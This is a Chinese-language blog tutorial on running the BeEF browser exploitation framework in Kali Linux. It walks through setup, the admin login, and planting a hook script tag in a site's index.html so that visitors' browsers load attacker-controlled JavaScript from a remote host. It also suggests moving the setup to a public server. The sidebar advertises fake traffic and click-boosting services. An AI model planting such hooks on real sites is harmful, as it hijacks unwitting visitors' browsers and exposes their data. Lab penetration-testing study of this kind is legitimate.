Kali Linux下XSS漏洞利用和XSS平台搭建工具:BeEF xss 教程

一、什么是BeEF?

BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。

 

随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。

 

BeEF xss除了是XSS漏洞利用工具,还是一个XSS平台搭建工具,可以本地搭建也可以服务器上搭建,唯一的缺点是:不支持Windows。

 

二、BeEF xss 下载

官方网址:https://beefproject.com/

github地址:https://github.com/beefproject/beef

 

三、BeEF xss 安装

安装我就不多说了,稍微有一点点的基础都会,如果你实在不行,完全可以直接用Kali Linux,Kali Linux是自带beef这款工具的,不需要你自己安装,只需要直接使用就可以了!

 

四、BeEF xss 使用教程

今天我就直接在Kali Linux下来实战这款Xss漏洞利用工具了,具体步骤如下:

 

1、修改默认beef密码;

如果你是第一次启动beef-xss,会提示让你修改密码。如下图:

我这就直接修改为:beefxss;

修改默认beef密码

 

注意:beef配置文件请看:

/etc/beef-xss/config.yaml   配置生效都是以这里为主,至少我这个Kali Linux版本是这样的。

/usr/share/beef-xss/config.yaml

 

当然:也可以直接通过去beef配置文件修改默认密码,都是可以的。

config.yaml修改默认beef密码

2、启动beef;

[email protected]:~/# beef-xss

beef-xss

 

注意:由于Kali Linux版本不同,可能你直接执行“beef-xss"或“beef"会说命令不存在,我们可以找到它的安装位置,再执行也是可以的,如下:

[email protected]:~/# find / -name beef
[email protected]:~/# cd /usr/share/beef-xss/

 

3、beef xss漏洞利用和xss平台本地网站搭建演练;

我不知道大家懂不懂JS,有没有了解过xss平台等相关的知识,你一定要明白以下几句话,这也是beef xss启动很重要的几个知识点。

Web UI: http://127.0.0.1:3000/ui/panel

[*] Hook: <script src="https://<IP>:3000/hook.js"></script>

[*] Example: <script src="https://127.0.0.1:3000/hook.js"></script>

 

由于我是本地搭建体验的beef xss,我现在有两个IP:

  • Kali Linux虚拟机的IP:192.168.1.101 (攻击机)
  • 物理电脑的IP:192.168.1.104 (受害机)

 

第一步:

去我的 192.168.1.104 搭建一个网站,首页是index.html,并放入以下代码:

<script src="https://192.168.1.101:3000/hook.js"></script>

 

第二步:

访问:192.168.1.104 /index.html ,触发上面加载的这个JS。

 

第三步:

打开“http://192.168.1.101:3000/ui/authentication”,我这的用户名是:beef;密码是:beefxss;

beef xss平台后台登陆

 

第四步:

进去后就能看到了192.168.1.104这个网站被我xss攻击后,我能得到了它很多的信息,具体大家可以仔细去看。

beef xss

 

注意:如果你是服务器的话,你需要改成你的外网IP,如果你想用服务器搭建xss平台的话,也是想用这款beef xss工具的话,建议你的服务器选择Debian,毕竟Kali Linux就是基于Debian的。

付杰
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
  • ¥ 1.0元
  • 市场价:9.9元
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: